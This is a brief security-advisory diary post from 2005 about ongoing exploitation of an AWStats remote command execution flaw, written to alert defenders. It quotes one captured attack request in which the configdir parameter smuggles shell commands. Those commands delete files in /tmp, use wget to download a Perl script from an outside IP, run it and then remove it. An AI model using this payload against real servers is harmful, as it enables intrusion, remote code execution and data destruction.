AWSTATS

Published: 2005-09-27. Last Updated: 2005-09-27 04:07:39 UTC
by Lorna Hutcheson (Version: 1)
0 comment(s)
AWSTATS has been a very frequent flyer as an email subject to us since the first vulnerability dealing with remote command execution was released this past January.  I went back through my old emails and since then we have gotten 77 emails all dealing with seeing this exploit in the wild, some successful, some not successful.  It has gotten more difficult to distinguish what is old and what is new.  Its all starting to blend together like all the SDbot variants running around out there (got one of those in the mail today too).  We received more reports today of the following activity taking place so keep your eyes open.

GET //awstats.pl?configdir=|echo
%20;cd%20/tmp;rm%20-rf%20*;wget%20http://218.188.9.19/.it/abc;perl%20abc;echo%20;rm%20-rf%20abc*;echo| HTTP/1.1

Also, see the diary by fellow handler Erik Fichtner dated August 29, 2005 for more on this.



Keywords:
0 comment(s)

Comments


Diary Archives